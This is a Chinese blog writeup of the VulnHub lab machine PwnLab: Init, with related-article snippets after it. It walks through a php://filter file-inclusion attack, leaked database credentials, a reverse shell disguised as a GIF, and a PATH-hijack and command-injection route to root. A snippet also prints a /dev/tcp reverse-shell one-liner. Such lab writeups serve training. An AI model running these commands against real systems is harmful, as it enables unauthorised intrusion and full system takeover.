vulnhub-pwnlab:init writeup

最新推荐文章于 2024-10-15 11:59:40 发布
最新推荐文章于 2024-10-15 11:59:40 发布
阅读量376 收藏 5
点赞数 4
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141329682
版权

pwnlab:init渗透过程(kali IP:192.168.39.128 靶机IP:192.168.39.131)

**一.信息收集**
nmap -sP 192.168.39.0/24
nmap -sV 192.158.39.131
dirsearch 192.168.39.131
nikto -h 192.168.39.131
收集信息:中间件apache 2.4.10 语言:php,nikto扫描出来说config.oho页面可能会有数据库账号密码,可是直接在网页上打不开

**二.漏洞查找与利用**
http://192.168.39.131/?page=../../../../etc/passwd    //在页面上没有发现什么可以用的,看这个url,可能可以遍历文件,可是尝试后不行
http://192.168.39.131/?page=php://filter/read=convert.base64-encode/resource=login    //用php://filter伪协议试一试,发现可以看页面源码,分析源码发现config.php确实有数据库信息,而且代码进行了预编译sql注入行不通
http://192.168.39.131/?page=php://filter/read=convert.base64-encode/resource=config    //查看config文件,用config.php打不开,可能进行了什么处理,数据库账号密码:$username = "root";$password = "H4u%QJ_H99"
mysql -h 192.168.39.131 -u root -p    //连接数据库,查找发现三个账号密码  | kent |  JWzXuBJJNy  ,| mike | SIfdsTEn6 ,    | kane | iSv5Ym2GRo,登陆进去发现可以文件上传
http://192.168.39.131/?page=php://filter/read=convert.base64-encode/resource=upload    //查看一下上传文件的源代码,发现是白名单过滤,只有上传符合条件的文件在结合文件包含
http://192.168.39.131/?page=php://filter/read=convert.base64-encode/resource=index    //这里看主页源码发现存在文件包含
cp /usr/share/webshells/php/php-reverse-shell.php test.gif    //把反弹shell写在gif文件里,再在文件开头加上GIF89a,上传上去,文件路径为:http://192.168.39.131/upload/f3035846cc279a1aff73b7c2c25367b9.gif
nc -vlp 8888    
curl 192.168.39.131 -H "cookie:lang=../upload/f3035846cc279a1aff73b7c2c25367b9.gif"    //连接webshell

**提权**
su kane    //进去之后看suid文件,版本信息,内核信息都没有头绪,想起之前数据库里的账号密码,三个都试了只有kane的有用
find / -perm -u=s -type f 2>/dev/null    //查看有suid的二进制文件发现在家目录下有个msgmike
cd ~
ls -al    //发现这个文件是以mike的身份执行的
./msgmike    //执行一下试一试,报错cat /home/mike/msg.txt不能执行,没有权限应该,这里可以尝试重新定义一个可执行文件,把/bin/bash写进去然后在运行msgmike,等脚本运行到cat时就会执行/bin/bash这样就获取了mike的shell
cd /tmp
echo '/bin/bash' > cat
chmod 777 cat
export PATH=/tmp:$PATH    //更改环境变量,把/tmp目录放在最前面,这样查找命令的时候就会最先查找/tmp目录下的
cd ~
./msgmike    //成功获取mike的shell
find / -perm -u=s -type f 2>/dev/null    //发现mike家目录下有个可以以root身份执行的文件msg2root
cd /home/mike
ls -al
./msg2root    //运行一下试一试,发现message for root 里输入什么命令都不会执行
strings msg2root    //从msg2root二进制文件查看可打印的字符串,寻找信息发现msg2root脚本使用fgets()只能读取一行,则对输入用 ; 隔开试一试
./msg2root
message for root: 1;ls    //发现ls命令执行了则直接执行/bin/sh或bash -p,得到rootshell
cd /root
ls
tac flag.txt    //这里不能用cat因为之前改了环境变量

Jay-wings
关注
AI Web 1.0通关攻略
2301_80402555的博客
08-19 374
访问http://172.16.1.88/robots.txt,发现/madiNf0/和/se3reTdir777/uploads/两个路径。使用dirb "http://172.16.1.88"进一步扫描,发现有一个robots.txt。访问http://172.16.1.88/se3reTdir777/index.php。使用dirb对/m3diNf0/扫描,发现info.php页面。访问/se3reTdir777/upload/发现也不能。使用dirb对//扫描,发现一个index.php的页面。
vulnhub靶机渗透:PWNLAB: INIT
Mysmycbx的博客
07-11 1001
vulnhub 靶机渗透:PWNLABINIT
Vulnhub靶机PWNLABINIT writeup
xingjinhao123的博客
07-05 268
Vulnhub靶机PWNLABINIT writeup
红队打靶练习:PWNLAB: INIT
分享
12-12 749
【代码】红队打靶练习:PWNLAB: INIT。犹如蟒蛇缠绕般的窒息感.......
Vulnhub靶机Funbox:1 writeup
xingjinhao123的博客
01-11 1549
下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 信息搜集 获取IP地址 扫描端口 这里看到一共开放了四个端口21:ftp,22:ssh,88:http,3306:mysql 21端口 登录ftp的时候需要用户名密码,先放着 80端口 访问80端口发现会跳转到funbox.fritz.box 修改hosts为: 再次访问80端口 这里看到使用了wordpress管理系统 可以使用wpscan尝试枚举下用户和插件: wpscan --url ht
VulnHub靶机MILNET:1writeup
xingjinhao123的博客
03-22 470
VulnHub靶机MILNET:1writeup 信息收集 获取IP地址 扫描端口 80端口(没有发现有用信息) 列举目录 只有一个info.php,访问之后发现允许文件包含和网站根目录的路径 经过测试可以通过base64形式执行远程命令注入 getshell 上传大马 msf联动拿shell 提权 查看用户 查看计划任务(这里看到每过一分钟会以root权限执行一次/backup/back..
vulnhub-Empire-Breakout writeup
qq_64272648的博客
08-19 233
/tar -cvf test.tar /var/backups/.old_pass.bak //寻找发现old_pass隐藏目录直接查看没有权限,先用tar压缩,再解压查看。cat /var/backups/.old_pass.bak //得到密码 Ts&4&YurgtRX(=~h。bash -i >& /dev/tcp/192.168.39.128/8888 0>&1 //反弹shell。cat user.txt //得到一个flag。cat r* //得到flag。
Vulnhub靶机hackme: 1 writeup
xingjinhao123的博客
01-14 2318
下载地址:https://www.vulnhub.com/entry/hackme-1,330/ 信息搜集 获取IP地址 扫描端口 80端口 首页是一个登录页面 发现有注册页面,注册一个账号admin:password,并且登录成功 登录成功之后的页面,是一个查阅图书的页面 尝试使用SQL注入 sqlmap -r sqlmap.txt --batch sqlmap.txt里面的内容,通过抓包获取的 sqlmap.txt POST /welcome.php HTTP/1.1 Host:
Vulnhub靶机Lampiao:1 writeup
xingjinhao123的博客
01-21 4260
下载地址:https://www.vulnhub.com/entry/lampiao-1,249/ 信息搜集 获取IP地址 扫描开放的端口 80端口 80端口没有任何发现 1898端口 发现启动了Drupal 7 列举目录 发现有熟悉的rebots.txt 在CHANGELOG.txt文件里面发现了Drupal 的版本是7.54 getshell 通过Kali中的Searchsploit工具可以确定Drupal 7.5...
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
Long-Long-Encrypt-Writeup:2021CTFSGCTF编写-长长加密
03-14
Long Long加密 一种简单的类似于RSA的加密。 由。 描述 文件: <BR文件: 解决方案 由于我是Crypto的新手,所以如果我搞砸了,请不要对我无礼。 第一部分:是RSA吗?... 正如我们可以从txt.enc文件中获得n,e,c...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
vulhub - TOMATO: 1 writeup
Jiajiajiang_的博客
05-26 739
靶机下载地址 主机发现 netdiscover -i eth0 -r 192.168.154.1/24 端口扫描 threader3000 ------------------------------------------------------------ Threader 3000 - Multi-threaded Port Scanner Version 1.0.7
vulhub - LEEROY: 1 writeup
Jiajiajiang_的博客
05-24 430
主机发现 && 端口扫描 终于是一台端口多一些的机器了 好了来吧 漏洞挖掘 22 首先呢ssh的版本是比较新的。 好的,那么还是从web下手吧,有俩。 80 就一图片 啥也不是 ctrl + U ,啥也不是 扫目录,啥也不是 啥也不是 8080 是个登录框 扫目录只发现robots.txt 13380 访问跳转leeroy.htb,去hosts文件加一下 加好了 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
最新发布
qq_44969472的博客
10-15 386
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1215
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1205
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
高级数据结构实验报告:ADS Writeup_2解析
2. ADS Writeup_2主题:从标题可以推测,该文件是关于高级数据结构的第二个练习题或案例研究的详细解析。Writeup_2表明这是系列文档中的第二个部分,意味着之前可能已经介绍过一些基础概念或者先行的练习题。该文档...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值